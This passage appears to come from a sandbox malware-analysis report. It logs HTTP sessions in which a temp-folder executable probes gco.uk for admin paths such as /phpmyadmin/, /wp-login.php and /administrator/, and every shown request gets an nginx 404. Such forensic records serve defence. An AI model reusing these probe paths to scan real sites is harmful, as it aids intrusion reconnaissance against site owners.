2023-11-30 10:23:24 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	52257	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:24 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:24 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:24 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:24 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	53027	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:24 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:25 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:25 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:25 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	53514	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:24 UTC	170	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:25 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:25 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:25 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	53934	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:25 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:25 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:25 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:25 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	56562	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:26 UTC	219	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
2023-11-30 10:23:26 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:26 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:26 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	56687	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:26 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:23:26 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:26 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:26 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	56853	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:26 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:26 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:26 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:26 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	57327	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:27 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:27 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:27 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:27 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	57130	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:27 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:27 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	57545	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:27 UTC	170	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:27 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	58286	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:28 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:28 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	58297	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:28 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:28 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:28 GMTContent-Type: text/htmlContent-Length: 162Connection: close
